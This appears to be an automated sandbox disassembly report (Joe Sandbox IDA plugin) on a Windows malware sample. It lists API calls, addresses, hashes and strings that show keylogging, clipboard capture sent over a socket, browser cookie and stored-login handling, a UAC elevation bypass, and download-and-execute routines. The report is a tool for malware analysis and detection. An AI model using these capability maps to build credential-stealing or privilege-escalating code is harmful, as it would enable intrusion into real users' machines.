                                          • Opcode ID: 240c7abc9a27c5f0695d89c57ca45c6d86bcae19cd69a5bd1518bd38cb464be9
                                          • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                          • Opcode Fuzzy Hash: 240c7abc9a27c5f0695d89c57ca45c6d86bcae19cd69a5bd1518bd38cb464be9
                                          • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                          APIs
                                          • OpenClipboard.USER32 ref: 004168FD
                                          • EmptyClipboard.USER32 ref: 0041690B
                                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                          • GlobalLock.KERNEL32(00000000), ref: 00416934
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                          • CloseClipboard.USER32 ref: 00416990
                                          • OpenClipboard.USER32 ref: 00416997
                                          • GetClipboardData.USER32(0000000D), ref: 004169A7
                                          • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                          • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                          • CloseClipboard.USER32 ref: 004169BF
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Similarity
                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                          • String ID: !D@$xdF
                                          • API String ID: 3520204547-3540039394
                                          • Opcode ID: f77a8bd79f0f7ce6039107014e74333b55bee0a4ab0882cfea4256be7aae21ab
                                          • Instruction ID: 40a69bedac3bd734cdfdd6227e623399476ab8ebe6f0a7c245c4ec6d1d06efb6
                                          • Opcode Fuzzy Hash: f77a8bd79f0f7ce6039107014e74333b55bee0a4ab0882cfea4256be7aae21ab
                                          • Instruction Fuzzy Hash: 16215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750F4,?,00475348), ref: 0040F4C9
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475348), ref: 0040F4F4
                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475348), ref: 0040F59E
                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                          • CloseHandle.KERNEL32(00000000,?,00475348), ref: 0040F6A9
                                          Similarity
                                          • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                          • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$xdF$xdF$RG
                                          • API String ID: 3756808967-1574553308
                                          • Opcode ID: 1d3b465f8a309ae3198bcab5bb83e2fcd34d8ef8e9b0c4606d8e85a41c47158d
                                          • Instruction ID: f7ffc7f0dfbd756cb6275d6ec2ba0be94116b78c8c9f611e281f0170cc986b4a
                                          • Opcode Fuzzy Hash: 1d3b465f8a309ae3198bcab5bb83e2fcd34d8ef8e9b0c4606d8e85a41c47158d
                                          • Instruction Fuzzy Hash: 4C7130705083419AC724FB21D8559AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                          • FindClose.KERNEL32(00000000), ref: 0040BE04
                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                          • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                          • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                          Similarity
                                          • API ID: Find$Close$File$FirstNext
                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                          • API String ID: 3527384056-432212279
                                          • Opcode ID: 61ad11e382702adddc4a1e89b9b08581dc943ae9ab3a3ebcc98b18262fb5c5cd
                                          • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                          • Opcode Fuzzy Hash: 61ad11e382702adddc4a1e89b9b08581dc943ae9ab3a3ebcc98b18262fb5c5cd
                                          • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                          APIs
                                          • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                          • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                          • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                          • CloseHandle.KERNEL32(?), ref: 004134A0
                                          Similarity
                                          • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                          • String ID:
                                          • API String ID: 297527592-0
                                          • Opcode ID: bf3db080d4aec6a02f50ad20c8827227bb634c24fb580ecc49855a8f971feb0a
                                          • Instruction ID: cfdeae1586e3f17d3ae994cf28232467201964e06db1490d1c70a6fe2d897c90
                                          • Opcode Fuzzy Hash: bf3db080d4aec6a02f50ad20c8827227bb634c24fb580ecc49855a8f971feb0a
                                          • Instruction Fuzzy Hash: A841F371104301BBD7109F26EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                          Similarity
                                          • API ID:
                                          • String ID: 0$1$2$3$4$5$6$7
                                          • API String ID: 0-3177665633
                                          • Opcode ID: bbb04b4e4ef4cf43d21947f6752686c6d5343f3de50f2534b72754370d573c82
                                          • Instruction ID: 3c74f5afe55031bef20d6cb4aa2bc38f0c43463ce83be6e36937eb537edf8bdf
                                          • Opcode Fuzzy Hash: bbb04b4e4ef4cf43d21947f6752686c6d5343f3de50f2534b72754370d573c82
                                          • Instruction Fuzzy Hash: CB71E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                          APIs
                                          • GetForegroundWindow.USER32(?,?,00475100), ref: 0040A451
                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                          • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                          • GetKeyState.USER32(00000010), ref: 0040A46E
                                          • GetKeyboardState.USER32(?,?,00475100), ref: 0040A479
                                          • ToUnicodeEx.USER32(00475154,00000000,?,?,00000010,00000000,00000000), ref: 0040A49C
                                          • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                          • ToUnicodeEx.USER32(00475154,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                          Similarity
                                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                          • String ID: (kG
                                          • API String ID: 1888522110-2813241365
                                          • Opcode ID: 79348ff8eaa35f6faedaca36de41c7c480938a272048c625dc6fe4e82d71162d
                                          • Instruction ID: 3b9a32d10988b9101c987d3e8fcb44953e801c6634267c48ca941b3c69dca571
                                          • Opcode Fuzzy Hash: 79348ff8eaa35f6faedaca36de41c7c480938a272048c625dc6fe4e82d71162d
                                          • Instruction Fuzzy Hash: F8316D72504308BFD700DFA0DC45F9B7BECAB88754F00083AB645D61A0D7B5E948CBA6
                                          APIs
                                            • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                            • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                            • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                            • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                            • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                          • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                          • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                          Similarity
                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                          • String ID: !D@$$aF$(aF$,aF$PowrProf.dll$SetSuspendState
                                          • API String ID: 1589313981-3345310279
                                          • Opcode ID: e2c31b5db78946f38df81b98e23598b924f86ca336777b9e14443aea536e3df9
                                          • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                          • Opcode Fuzzy Hash: e2c31b5db78946f38df81b98e23598b924f86ca336777b9e14443aea536e3df9
                                          • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                          APIs
                                          • _wcslen.LIBCMT ref: 0040755C
                                          • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                          Similarity
                                          • API ID: Object_wcslen
                                          • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                          • API String ID: 240030777-3166923314
                                          • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                          • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                          • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                          • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                          APIs
                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758F8), ref: 0041A7EF
                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                          • GetLastError.KERNEL32 ref: 0041A84C
                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                          • String ID:
                                          • API String ID: 3587775597-0
                                          • Opcode ID: 6d200c93f34079ae71c82b73248bc1d4a0017c0a1dadb16676f11039057c5814
                                          • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                          • Opcode Fuzzy Hash: 6d200c93f34079ae71c82b73248bc1d4a0017c0a1dadb16676f11039057c5814
                                          • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                          • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                          • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                          • String ID: JD$JD$JD
                                          • API String ID: 745075371-3517165026
                                          • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                          • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                          • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                          • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                          • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                          • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$CloseFile$FirstNext
                                          • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                          • API String ID: 1164774033-405221262
                                          • Opcode ID: 9a74441e6a62c791e3d48e394381276e6adc98fd532e91d105d045f394039e41
                                          • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                          • Opcode Fuzzy Hash: 9a74441e6a62c791e3d48e394381276e6adc98fd532e91d105d045f394039e41
                                          • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C37D
                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C3AD
                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C41F
                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C42C
                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C402
                                          • GetLastError.KERNEL32(?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C44D
                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C463
                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C46A
                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C473
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                          • String ID:
                                          • API String ID: 2341273852-0
                                          • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                          • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                          • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                          • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                          APIs
                                          • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                          • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                          • String ID: SHDeleteKeyW$Shlwapi.dll
                                          • API String ID: 2127411465-314212984
                                          • Opcode ID: 834e0a0357c9bd35fc75afbee9585628136f3e7a26421bc33e01608f2dfc2d19
                                          • Instruction ID: cc57822c2a7f940fffebe33daf0632284ddc1748a3b8d5e961f42c670a34d5b4
                                          • Opcode Fuzzy Hash: 834e0a0357c9bd35fc75afbee9585628136f3e7a26421bc33e01608f2dfc2d19
                                          • Instruction Fuzzy Hash: D1B1F671A0430066CA14BB76DC579AF36A89F91748F40053FB906671E2EE7D8A48C6DA
                                          APIs
                                          • _free.LIBCMT ref: 00449292
                                          • _free.LIBCMT ref: 004492B6
                                          • _free.LIBCMT ref: 0044943D
                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                          • _free.LIBCMT ref: 00449609
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                          • String ID:
                                          • API String ID: 314583886-0
                                          • Opcode ID: 85d2a707ffa6ab69f680b8646be9a2f79c2d84175361cf4d1e6837d974162392
                                          • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                          • Opcode Fuzzy Hash: 85d2a707ffa6ab69f680b8646be9a2f79c2d84175361cf4d1e6837d974162392
                                          • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Find$CreateFirstNext
                                          • String ID: 8eF$HSG$`XG$`XG
                                          • API String ID: 341183262-1600017543
                                          • Opcode ID: 6f81fefc4da4586ac3ce1899c292dfe7ae8a9e1856cb00082ed84c70e3d1e44f
                                          • Instruction ID: 3e2b8d556a8fbdbb081ab446324185a4f3aab8361380fbf0113865ad31d0729a
                                          • Opcode Fuzzy Hash: 6f81fefc4da4586ac3ce1899c292dfe7ae8a9e1856cb00082ed84c70e3d1e44f
                                          • Instruction Fuzzy Hash: 588151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                          Strings
                                          • C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, xrefs: 00407042, 0040716A
                                          • 0aF, xrefs: 0040712C
                                          • 0aF, xrefs: 0040701B
                                          • open, xrefs: 00406FF1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DownloadExecuteFileShell
                                          • String ID: 0aF$0aF$C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe$open
                                          • API String ID: 2825088817-147149048
                                          • Opcode ID: cf2b83abeb2134a1df915f4201471098f2d667ecf5e68f6bac9d0fe0b16a1e4a
                                          • Instruction ID: e12f74d6213dd3660153607da8c9b98f7978e2d251169c1aa1e307be856b925d
                                          • Opcode Fuzzy Hash: cf2b83abeb2134a1df915f4201471098f2d667ecf5e68f6bac9d0fe0b16a1e4a
                                          • Instruction Fuzzy Hash: 1461C471A0830166CA14FB76C8569BE37A59F81758F40093FF9427B2D2EE3C9905C79B
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0040884C
                                          • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                          • String ID: xdF
                                          • API String ID: 1771804793-999140092
                                          • Opcode ID: 38802d10882615ef338cffc9586822bbeeed39d2cd44aa7df9ba9a74de3d35aa
                                          • Instruction ID: 967e03bdddb214c30410211942a515ee3c29859e80101891d5c5db132fd2cd64
                                          • Opcode Fuzzy Hash: 38802d10882615ef338cffc9586822bbeeed39d2cd44aa7df9ba9a74de3d35aa
                                          • Instruction Fuzzy Hash: 94517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB99
                                          APIs
                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                          • GetLastError.KERNEL32 ref: 0040BA93
                                          Strings
                                          • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                          • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                          • UserProfile, xrefs: 0040BA59
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
